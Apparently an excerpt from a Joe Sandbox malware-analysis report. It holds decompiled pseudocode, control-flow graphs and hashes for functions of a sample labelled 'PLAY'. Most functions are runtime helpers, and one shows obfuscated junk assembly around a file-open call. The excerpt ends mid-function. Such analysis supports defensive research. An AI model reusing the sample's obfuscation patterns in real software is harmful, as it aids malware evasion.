          0x00ae97ab
          0x00ae978b
          0x00ae978f
          0x00ae9792
          0x00ae979b
          0x00ae979e
          0x00ae97a3
          0x00ae97a6
          0x00ae97a6
          0x00ae97ba
          0x00ae97c7
          0x00ae97c9
          0x00ae97ce
          0x00ae97d3
          0x00ae97d8
          0x00ae97db
          0x00ae97e1
          0x00ae97ef
          0x00ae97f3
          0x00ae97f4
          0x00ae97f8
          0x00ae97fd
          0x00ae97e3
          0x00ae97e3
          0x00ae97e3
          0x00ae9800
          0x00ae9809
          0x00ae980b
          0x00ae980b
          0x00ae9811
          0x00ae9814
          0x00ae9819
          0x00ae981a
          0x00ae9836
          0x00ae983b
          0x00ae9841
          0x00ae985c
          0x00ae981c
          0x00ae981c
          0x00ae9820
          0x00ae9820
          0x00ae964b
          0x00ae965e
          0x00ae965e
          0x00ae95ca
          0x00ae95ca
          0x00000000
          0x00ae95cc
          0x00ae95cc
          0x00ae95cf
          0x00ae95d3
          0x00ae95d3
          0x00ae95ca

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID: f
          • API String ID: 0-1993550816
          • Opcode ID: 0667a466afd1b919e3a0bbdf36a02118f8d1dbb5dded18f40723fd9a71dba545
          • Instruction ID: 347a7cf6cfde1297a08b50a80271f3bd0fca9f6613c5f49c30f741988fc5583a
          • Opcode Fuzzy Hash: 0667a466afd1b919e3a0bbdf36a02118f8d1dbb5dded18f40723fd9a71dba545
          • Instruction Fuzzy Hash: 70B1F072D003988BDB20DFB9CC417EEBBB0AF55310F144269E959AB382EB345989CB51
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFB9A2 Relevance: 4.7, APIs: 3, Instructions: 199COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1219 afb9a2-afb9bb 1220 afb9bd-afb9cd call aff27e 1219->1220 1221 afb9d1-afb9d6 1219->1221 1220->1221 1227 afb9cf 1220->1227 1223 afb9d8-afb9e0 1221->1223 1224 afb9e3-afba0b call afd1ab 1221->1224 1223->1224 1229 afbb69-afbb7a call af7b30 1224->1229 1230 afba11-afba1d 1224->1230 1227->1221 1232 afba1f-afba24 1230->1232 1233 afba54 1230->1233 1236 afba39-afba44 call afc308 1232->1236 1237 afba26-afba2f call b02a40 1232->1237 1235 afba56-afba58 1233->1235 1239 afbb5e 1235->1239 1240 afba5e-afba71 call afd1ab 1235->1240 1246 afba4f-afba52 1236->1246 1247 afba46 1236->1247 1237->1246 1250 afba31-afba37 1237->1250 1244 afbb60-afbb67 call afbbd5 1239->1244 1240->1239 1252 afba77-afba89 call afe327 1240->1252 1244->1229 1246->1235 1251 afba4c 1247->1251 1250->1251 1251->1246 1255 afba8e-afba92 1252->1255 1255->1239 1256 afba98-afbaa0 1255->1256 1257 afbada-afbae6 1256->1257 1258 afbaa2-afbaa7 1256->1258 1259 afbae8-afbaea 1257->1259 1260 afbb17 1257->1260 1258->1244 1261 afbaad-afbaaf 1258->1261 1264 afbaff-afbb0a call afc308 1259->1264 1265 afbaec-afbaf5 call b02a40 1259->1265 1262 afbb19-afbb1b 1260->1262 1261->1239 1263 afbab5-afbacf call afe327 1261->1263 1266 afbb1d-afbb36 call afe327 1262->1266 1267 afbb57-afbb5d call afbbd5 1262->1267 1263->1244 1277 afbad5 1263->1277 1264->1267 1280 afbb0c 1264->1280 1265->1267 1278 afbaf7-afbafd 1265->1278 1266->1267 1281 afbb38-afbb3f 1266->1281 1267->1239 1277->1239 1282 afbb12-afbb15 1278->1282 1280->1282 1283 afbb7b-afbb81 1281->1283 1284 afbb41-afbb42 1281->1284 1282->1262 1285 afbb43-afbb55 call afd227 1283->1285 1284->1285 1285->1267 1288 afbb83-afbb8a call afbbd5 1285->1288 1288->1244
          C-Code - Quality: 61%
          			E00AFB9A2(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				signed int _t41;
				signed int _t49;
				void* _t52;
				void* _t54;
				signed int _t56;
				void* _t60;
				intOrPtr _t63;
				void* _t64;
				intOrPtr _t68;
				intOrPtr* _t71;
				intOrPtr _t85;
				intOrPtr* _t91;
				intOrPtr _t93;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0xb0b004; // 0x700d25f7
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t68 = E00AFF27E(_a16, _t93);
					_t103 = _t68 - _t93;
					_t4 = _t68 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t68;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t85 = E00AFD1AB(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t85;
				if(_t85 == 0) {
					L39:
					return E00AF7B30(_v8 ^ _t96);
				} else {
					_t17 = _t85 + _t85 + 8; // 0x8
					_t75 = _t17;
					asm("sbb eax, eax");
					_t49 = _t85 + _t85 & _t17;
					if(_t49 == 0) {
						_t71 = 0;
						L15:
						if(_t71 == 0) {
							L37:
							_t95 = 0;
							L38:
							E00AFBBD5(_t71);
							goto L39;
						}
						_t52 = E00AFD1AB(_t88, 1, _a16, _t93, _t71, _t85);
						_t100 = _t98 + 0x18;
						if(_t52 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t54 = E00AFE327(_a8, _a12, _t71, _v12, 0, 0, 0, 0, 0); // executed
						_t95 = _t54;
						if(_t95 == 0) {
							goto L37;
						}
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							_t77 = _t31;
							asm("sbb eax, eax");
							_t56 = _t95 + _t95 & _t31;
							if(_t56 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E00AFE327(_a8, _a12, _t71, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E00AFBBD5(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t60 = E00AFD227();
									_t95 = _t60;
									if(_t60 != 0) {
										E00AFBBD5(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t56 > 0x400) {
								_t91 = E00AFC308(_t77, _t56);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E00B02A40();
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t64 = E00AFE327(_a8, _a12, _t71, _t90, _a24, _t63, 0, 0, 0);
						_t95 = _t64;
						if(_t64 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t71 = E00AFC308(_t75, _t49);
						if(_t71 == 0) {
							L13:
							_t85 = _v12;
							goto L15;
						}
						 *_t71 = 0xdddd;
						L12:
						_t71 = _t71 + 8;
						goto L13;
					}
					E00B02A40();
					_t71 = _t98;
					if(_t71 == 0) {
						goto L13;
					}
					 *_t71 = 0xcccc;
					goto L12;
				}
			}
























          0x00afb9a7
          0x00afb9a8
          0x00afb9a9
          0x00afb9b0
          0x00afb9b5
          0x00afb9bb
          0x00afb9c1
          0x00afb9c7
          0x00afb9ca
          0x00afb9ca
          0x00afb9cd
          0x00afb9cf
          0x00afb9cf
          0x00afb9cd
          0x00afb9d1
          0x00afb9d6
          0x00afb9dd
          0x00afb9e0
          0x00afb9e0
          0x00afba01
          0x00afba03
          0x00afba06
          0x00afba0b
          0x00afbb69
          0x00afbb7a
          0x00afba11
          0x00afba14
          0x00afba14
          0x00afba19
          0x00afba1b
          0x00afba1d
          0x00afba54
          0x00afba56
          0x00afba58
          0x00afbb5e
          0x00afbb5e
          0x00afbb60
          0x00afbb61
          0x00000000
          0x00afbb67
          0x00afba67
          0x00afba6c
          0x00afba71
          0x00000000
          0x00000000
          0x00afba77
          0x00afba89
          0x00afba8e
          0x00afba92
          0x00000000
          0x00000000
          0x00afbaa0
          0x00afbadd
          0x00afbadd
          0x00afbae2
          0x00afbae4
          0x00afbae6
          0x00afbb17
          0x00afbb19
          0x00afbb1b
          0x00afbb57
          0x00afbb58
          0x00000000
          0x00afbb38
          0x00afbb3a
          0x00afbb3b
          0x00afbb3f
          0x00afbb7b
          0x00afbb7e
          0x00afbb41
          0x00afbb41
          0x00afbb42
          0x00afbb42
          0x00afbb43
          0x00afbb44
          0x00afbb45
          0x00afbb46
          0x00afbb49
          0x00afbb4e
          0x00afbb55
          0x00afbb84
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00afbb55
          0x00afbb1b
          0x00afbaea
          0x00afbb05
          0x00afbb0a
          0x00000000
          0x00000000
          0x00afbb0c
          0x00afbb12
          0x00afbb12
          0x00000000
          0x00afbb12
          0x00afbaec
          0x00afbaf1
          0x00afbaf5
          0x00000000
          0x00000000
          0x00afbaf7
          0x00000000
          0x00afbaf7
          0x00afbaa2
          0x00afbaa7
          0x00000000
          0x00000000
          0x00afbaaf
          0x00000000
          0x00000000
          0x00afbac6
          0x00afbacb
          0x00afbacf
          0x00000000
          0x00000000
          0x00000000
          0x00afbad5
          0x00afba24
          0x00afba3f
          0x00afba44
          0x00afba4f
          0x00afba4f
          0x00000000
          0x00afba4f
          0x00afba46
          0x00afba4c
          0x00afba4c
          0x00000000
          0x00afba4c
          0x00afba26
          0x00afba2b
          0x00afba2f
          0x00000000
          0x00000000
          0x00afba31
          0x00000000
          0x00afba31

          APIs
          • __freea.LIBCMT ref: 00AFBB58
            • Part of subcall function 00AFC308: RtlAllocateHeap.NTDLL(00000000,558B0000,558B0000,?,00AFCD47,00000220,00AFFA61,558B0000,?,?,?,?,00000016,00000000,?,00AFFA61), ref: 00AFC33A
          • __freea.LIBCMT ref: 00AFBB61
          • __freea.LIBCMT ref: 00AFBB84
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: __freea$AllocateHeap
          • String ID:
          • API String ID: 2243444508-0
          • Opcode ID: 04cadde3c6163748b36057f86fae3631d2392e093818818eec8880474352aa9a
          • Instruction ID: 05a8d55e82c3fbedc34c40c1affec2c662588c602678f96d6dfed98b114003eb
          • Opcode Fuzzy Hash: 04cadde3c6163748b36057f86fae3631d2392e093818818eec8880474352aa9a
          • Instruction Fuzzy Hash: 3D51C37262020EABEB25AFE5CD81EBB3AB9EF44750F150169FF049B154E731DC1186B0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFD30B Relevance: 4.5, APIs: 3, Instructions: 37COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1291 afd30b-afd319 GetEnvironmentStringsW 1292 afd31f-afd32e call afd2d4 call afc308 1291->1292 1293 afd31b-afd31d 1291->1293 1298 afd333-afd339 1292->1298 1294 afd356-afd35a 1293->1294 1299 afd33b-afd343 call af9960 1298->1299 1300 afd346-afd355 call afc2ce FreeEnvironmentStringsW 1298->1300 1299->1300 1300->1294
          C-Code - Quality: 100%
          			E00AFD30B(void* __ecx) {
				void* _t3;
				void* _t13;
				void* _t17;
				WCHAR* _t18;

				_t13 = __ecx;
				_t18 = GetEnvironmentStringsW();
				if(_t18 != 0) {
					_t11 = E00AFD2D4(_t18) - _t18 & 0xfffffffe;
					_t3 = E00AFC308(_t13, E00AFD2D4(_t18) - _t18 & 0xfffffffe); // executed
					_t17 = _t3;
					if(_t17 != 0) {
						E00AF9960(_t17, _t18, _t11);
					}
					E00AFC2CE(0);
					FreeEnvironmentStringsW(_t18);
				} else {
					_t17 = 0;
				}
				return _t17;
			}







          0x00afd30b
          0x00afd315
          0x00afd319
          0x00afd32a
          0x00afd32e
          0x00afd333
          0x00afd339
          0x00afd33e
          0x00afd343
          0x00afd348
          0x00afd34f
          0x00afd31b
          0x00afd31b
          0x00afd31b
          0x00afd35a

          APIs
          • GetEnvironmentStringsW.KERNEL32 ref: 00AFD30F
          • _free.LIBCMT ref: 00AFD348
          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00AFD34F
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: EnvironmentStrings$Free_free
          • String ID:
          • API String ID: 2716640707-0
          • Opcode ID: 0713fb73abe1fd718f354102d658dbd899e614ab478a900dc20e9c928dcbc1a6
          • Instruction ID: f2e9c0bd321440c1057a8ace520e735aba18a76e1ff6041556f95adc2e76bee5
          • Opcode Fuzzy Hash: 0713fb73abe1fd718f354102d658dbd899e614ab478a900dc20e9c928dcbc1a6
          • Instruction Fuzzy Hash: FBE02B3750462D66D22333F63E89ABF0A1ECFC23F07250315F71467182EF504C0241A2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFCB89 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
          Download Yara Rule
          C-Code - Quality: 97%
          			E00AFCB89(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				signed int _t58;
				char _t61;
				char _t67;
				signed char _t68;
				signed int _t69;
				signed int _t79;
				char _t83;
				signed int _t86;
				signed char _t87;
				char _t88;
				signed int _t89;
				void* _t90;
				intOrPtr _t95;
				signed int _t96;

				_t89 = __edx;
				_t58 =  *0xb0b004; // 0x700d25f7
				_v8 = _t58 ^ _t96;
				_t95 = _a4;
				if( *(_t95 + 4) == 0xfde9) {
					L19:
					__eflags = 0;
					_t83 = 0;
					do {
						_t46 = _t83 - 0x61; // -97
						_t90 = _t46;
						_t47 = _t90 + 0x20; // -65
						__eflags = _t47 - 0x19;
						if(_t47 > 0x19) {
							__eflags = _t90 - 0x19;
							if(_t90 > 0x19) {
								_t61 = 0;
							} else {
								_t53 = _t95 + 0x19; // 0xafcfcd
								 *(_t53 + _t83) =  *(_t53 + _t83) | 0x00000020;
								_t54 = _t83 - 0x20; // -32
								_t61 = _t54;
							}
						} else {
							 *(_t95 + _t83 + 0x19) =  *(_t95 + _t83 + 0x19) | 0x00000010;
							_t52 = _t83 + 0x20; // 0x20
							_t61 = _t52;
						}
						 *((char*)(_t95 + _t83 + 0x119)) = _t61;
						_t83 = _t83 + 1;
						__eflags = _t83 - 0x100;
					} while (_t83 < 0x100);
					L26:
					return E00AF7B30(_v8 ^ _t96);
				}
				_t5 = _t95 + 4; // 0xe8458d00
				if(GetCPInfo( *_t5,  &_v1820) == 0) {
					goto L19;
				} else {
					_t67 = 0;
					do {
						 *((char*)(_t96 + _t67 - 0x104)) = _t67;
						_t67 = _t67 + 1;
					} while (_t67 < 0x100);
					_t68 = _v1814;
					_t86 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t104 = _t68;
						if(_t68 == 0) {
							break;
						}
						_t89 =  *(_t86 + 1) & 0x000000ff;
						_t69 = _t68 & 0x000000ff;
						while(1) {
							__eflags = _t69 - _t89;
							if(_t69 > _t89) {
								break;
							}
							__eflags = _t69 - 0x100;
							if(_t69 >= 0x100) {
								break;
							}
							 *((char*)(_t96 + _t69 - 0x104)) = 0x20;
							_t69 = _t69 + 1;
							__eflags = _t69;
						}
						_t86 = _t86 + 2;
						__eflags = _t86;
						_t68 =  *_t86;
					}
					_t14 = _t95 + 4; // 0xe8458d00
					E00AFDB82(0, _t89, 0x100, _t95, _t104, 0, 1,  &_v264, 0x100,  &_v1800,  *_t14, 0);
					_t17 = _t95 + 4; // 0xe8458d00
					_t20 = _t95 + 0x21c; // 0xc4313d52
					E00AFBB8C(0, 0x100, _t95, _t104, 0,  *_t20, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t17, 0); // executed
					_t22 = _t95 + 4; // 0xe8458d00
					_t24 = _t95 + 0x21c; // 0xc4313d52
					E00AFBB8C(0, 0x100, _t95, _t104, 0,  *_t24, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t22, 0);
					_t79 = 0;
					do {
						_t87 =  *(_t96 + _t79 * 2 - 0x704) & 0x0000ffff;
						if((_t87 & 0x00000001) == 0) {
							__eflags = _t87 & 0x00000002;
							if((_t87 & 0x00000002) == 0) {
								_t88 = 0;
							} else {
								 *(_t95 + _t79 + 0x19) =  *(_t95 + _t79 + 0x19) | 0x00000020;
								_t88 =  *((intOrPtr*)(_t96 + _t79 - 0x304));
							}
						} else {
							 *(_t95 + _t79 + 0x19) =  *(_t95 + _t79 + 0x19) | 0x00000010;
							_t88 =  *((intOrPtr*)(_t96 + _t79 - 0x204));
						}
						 *((char*)(_t95 + _t79 + 0x119)) = _t88;
						_t79 = _t79 + 1;
					} while (_t79 < 0x100);
					goto L26;
				}
			}
























          0x00afcb89
          0x00afcb94
          0x00afcb9b
          0x00afcba0
          0x00afcbab
          0x00afccbd
          0x00afccbd
          0x00afccc4
          0x00afccc6
          0x00afccc6
          0x00afccc6
          0x00afccc9
          0x00afcccc
          0x00afcccf
          0x00afccdb
          0x00afccde
          0x00afcced
          0x00afcce0
          0x00afcce0
          0x00afcce5
          0x00afcce8
          0x00afcce8
          0x00afcce8
          0x00afccd1
          0x00afccd1
          0x00afccd6
          0x00afccd6
          0x00afccd6
          0x00afccef
          0x00afccf6
          0x00afccf7
          0x00afccf7
          0x00afccfb
          0x00afcd09
          0x00afcd09
          0x00afcbb8
          0x00afcbc3
          0x00000000
          0x00afcbc9
          0x00afcbd0
          0x00afcbd2
          0x00afcbd2
          0x00afcbd9
          0x00afcbda
          0x00afcbde
          0x00afcbe4
          0x00afcbea
          0x00afcc12
          0x00afcc12
          0x00afcc14
          0x00000000
          0x00000000
          0x00afcbf3
          0x00afcbf7
          0x00afcc09
          0x00afcc09
          0x00afcc0b
          0x00000000
          0x00000000
          0x00afcbfc
          0x00afcbfe
          0x00000000
          0x00000000
          0x00afcc00
          0x00afcc08
          0x00afcc08
          0x00afcc08
          0x00afcc0d
          0x00afcc0d
          0x00afcc10
          0x00afcc10
          0x00afcc17
          0x00afcc2c
          0x00afcc32
          0x00afcc46
          0x00afcc4d
          0x00afcc5c
          0x00afcc6e
          0x00afcc75
          0x00afcc7d
          0x00afcc7f
          0x00afcc7f
          0x00afcc8a
          0x00afcc9a
          0x00afcc9d
          0x00afccad
          0x00afcc9f
          0x00afcc9f
          0x00afcca4
          0x00afcca4
          0x00afcc8c
          0x00afcc8c
          0x00afcc91
          0x00afcc91
          0x00afccaf
          0x00afccb6
          0x00afccb7
          0x00000000
          0x00afccbb

          APIs
          • GetCPInfo.KERNEL32(E8458D00,?,00AFFA6D,00AFFA61,00000000), ref: 00AFCBBB
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: Info
          • String ID:
          • API String ID: 1807457897-3916222277
          • Opcode ID: 4154986f719f3ee44ce312fe1bf16011ff03ed276762446da709fe91806f3766
          • Instruction ID: 73f62a0c570441ac17c3f49b85357676ed6738b08ba258ae6535847ed050f8e5
          • Opcode Fuzzy Hash: 4154986f719f3ee44ce312fe1bf16011ff03ed276762446da709fe91806f3766
          • Instruction Fuzzy Hash: B74129B050424C9ADB258B9ACE94BFABBBDAB05314F2404ADF68AC7142D2349D46DB20
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AE1B32 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 122COMMON
          Download Yara Rule
          C-Code - Quality: 33%
          			E00AE1B32(void* __ebx, void* __ecx, void* __edi, void* __eflags, void* __fp0) {
				intOrPtr _t23;
				intOrPtr _t28;
				void* _t38;
				void* _t46;
				intOrPtr* _t53;
				void* _t54;
				intOrPtr* _t55;
				signed int _t56;
				void* _t58;
				void* _t61;
				void* _t62;
				void* _t65;
				signed int _t72;
				signed int _t73;
				void* _t78;
				void* _t79;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t84;
				intOrPtr* _t86;

				_t65 = __edi;
				_t46 = __ebx;
				_t73 =  !_t72;
				_t68 =  *((intOrPtr*)(_t73 - 0x280));
				_push(__ecx);
				_t23 = E00AEE5C0( *((intOrPtr*)( *((intOrPtr*)(_t73 - 0x280)))), _t73 - 0x150);
				_t79 = _t78 + 4;
				if(_t23 == 0) {
					L22:
					return E00AF7B30( *(_t73 - 4) ^ _t73);
				} else {
					E00AF8BB0(__edi, _t73 - 0x258, 0, 0x104);
					_t53 = _t73 - 0x150;
					_t81 = _t79 + 0xc;
					_t61 = _t53 + 1;
					do {
						_t28 =  *_t53;
						_t53 = _t53 + 1;
					} while (_t28 != 0);
					_t54 = _t53 - _t61;
					if(_t54 > 0) {
						while( *((char*)(_t73 + _t54 - 0x150)) != 0x5c) {
							_t54 = _t54 - 1;
							if(_t54 > 0) {
								continue;
							} else {
							}
							goto L8;
						}
						E00AFA1C0(_t73 - 0x258, 0x104, _t73 - 0x14f + _t54);
						_t81 = _t81 + 0xc;
					}
					L8:
					_t55 = _t73 - 0x258;
					_t62 = _t55 + 1;
					do {
						_t23 =  *_t55;
						_t55 = _t55 + 1;
					} while (_t23 != 0);
					_t56 = _t55 - _t62;
					if(_t56 == 0) {
						goto L22;
					} else {
						_t82 = _t81 - 0xc;
						if(0x36ab <= 0x311b) {
							_t82 = _t82 + 0x1c5;
						}
						_t83 = _t82 + 0xc;
						E00AE1BEF(0x36ab);
						asm("sahf");
						if(0x36ab >= 0x311b) {
							asm("cs stosb");
							asm("lahf");
							_push(0x31);
							_t73 = 0x00000031 ^  *(_t65 + 0x42082777);
							 *( *0xf09ab0b3 - 8) =  *( *0xf09ab0b3 - 8) >> _t56;
							_push(0xffffffe6);
							asm("sbb al, 0x8b");
							E00AEDEC0(_t46, _t56, _t65, _t68 - 1);
							_t38 = CreateFileA(_t73 - 0x150, 0x80000000, 1, 0, 3, 0x80, 0); // executed
							_t58 = _t38;
							 *(_t73 - 0x260) = _t58;
							if(_t58 != 0xffffffff) {
								asm("xorps xmm0, xmm0");
								asm("movlpd [ebp-0x270], xmm0");
								_t84 = _t83 - 8;
								if(0x76 <= 0x11) {
									_t84 = _t84 + 0x1fa;
								}
								L21();
								asm("das");
								asm("ror dh, 0x9e");
								_t86 = _t84 + 9;
								asm("ficom word [ebp+edx*4-0x36]");
								 *_t86 =  *_t86 + 0x28;
								return 0x76;
							} else {
								_t56 =  *(_t73 - 4);
								goto L17;
							}
						} else {
							L17:
							asm("cld");
							return E00AF7B30(_t56 ^ _t73 - 0x00000001);
						}
					}
				}
			}
























          0x00ae1b32
          0x00ae1b32
          0x00ae1b32
          0x00ae1b36
          0x00ae1b42
          0x00ae1b45
          0x00ae1b4a
          0x00ae1b4f
          0x00ae2452
          0x00ae2465
          0x00ae1b55
          0x00ae1b63
          0x00ae1b68
          0x00ae1b6e
          0x00ae1b71
          0x00ae1b74
          0x00ae1b74
          0x00ae1b76
          0x00ae1b77
          0x00ae1b7b
          0x00ae1b7f
          0x00ae1b81
          0x00ae1b8b
          0x00ae1b8e
          0x00000000
          0x00000000
          0x00ae1b90
          0x00000000
          0x00ae1b8e
          0x00ae1ba7
          0x00ae1bac
          0x00ae1bac
          0x00ae1baf
          0x00ae1baf
          0x00ae1bb5
          0x00ae1bb8
          0x00ae1bb8
          0x00ae1bba
          0x00ae1bbb
          0x00ae1bbf
          0x00ae1bc1
          0x00000000
          0x00ae1bc7
          0x00ae1bc7
          0x00ae1bd6
          0x00ae1bd8
          0x00ae1bd8
          0x00ae1bde
          0x00ae1be1
          0x00ae1be6
          0x00ae1be9
          0x00ae1c17
          0x00ae1c1a
          0x00ae1c1b
          0x00ae1c1c
          0x00ae1c27
          0x00ae1c2b
          0x00ae1c2f
          0x00ae1c36
          0x00ae1c54
          0x00ae1c56
          0x00ae1c58
          0x00ae1c61
          0x00ae1c79
          0x00ae1c7c
          0x00ae1c84
          0x00ae1c8b
          0x00ae1c8d
          0x00ae1c8d
          0x00ae1c96
          0x00ae1c9b
          0x00ae1c9c
          0x00ae1c9f
          0x00ae1ca0
          0x00ae1ca4
          0x00ae1ca8
          0x00ae1c63
          0x00ae1c6b
          0x00000000
          0x00ae1c6b
          0x00ae1beb
          0x00ae1c6c
          0x00ae1c6d
          0x00ae1c78
          0x00ae1c78
          0x00ae1be9
          0x00ae1bc1

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID: \
          • API String ID: 0-2967466578
          • Opcode ID: 86769270380527bb2e2958335c7d872334e4071e29a2cf0fb526d53d7bbb91c4
          • Instruction ID: ee8d7156dbef9dae70c3fd6334a9b31716a1be96e6f0e5e9088eb8ced2cebe12
          • Opcode Fuzzy Hash: 86769270380527bb2e2958335c7d872334e4071e29a2cf0fb526d53d7bbb91c4
          • Instruction Fuzzy Hash: F331CF31E0499886DF24DBB9DC56BF97315EF81320F1403ECE9099B1C2FB725A458B91
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AE1929 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 94COMMON
          Download Yara Rule
          C-Code - Quality: 44%
          			E00AE1929(void* __eax, signed int __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t44;
				signed int _t47;
				signed int _t56;
				void* _t57;
				void* _t58;
				intOrPtr* _t61;

				_t47 = __ecx;
				 *(__edx + 0xdc5aa1f) =  *(__edx + 0xdc5aa1f) & _t56;
				goto L6;
				asm("in eax, dx");
				 *((intOrPtr*)(__edx - 0x74a98b5b)) =  *((intOrPtr*)(__edx - 0x74a98b5b)) - __ecx;
				__eax = __eax | 0x00b0d6b0;
				__eax = E00AEDEC0(__ebx, __ecx, __edi, __esi);
				__ecx = __ebp - 0x218;
				__eax =  *__eax( *(__ebp - 0x1240),  *((intOrPtr*)(__ebp - 0x1244)), __ebp - 0x218, 0x104); // executed
				if(__eax != 0) {
					__ebx = 0;
					__edi = 0;
					if( *((intOrPtr*)(__ebp - 0x122c)) > 0) {
						__esi = 0;
						do {
							__edx = __ebp - 0x110;
							__ecx = __ebp - 0x218;
							__eax = E00AE1280(__eax, __ebp - 0x218, __ebp - 0x110);
							if(__eax != 0) {
								if(__ebx == 0) {
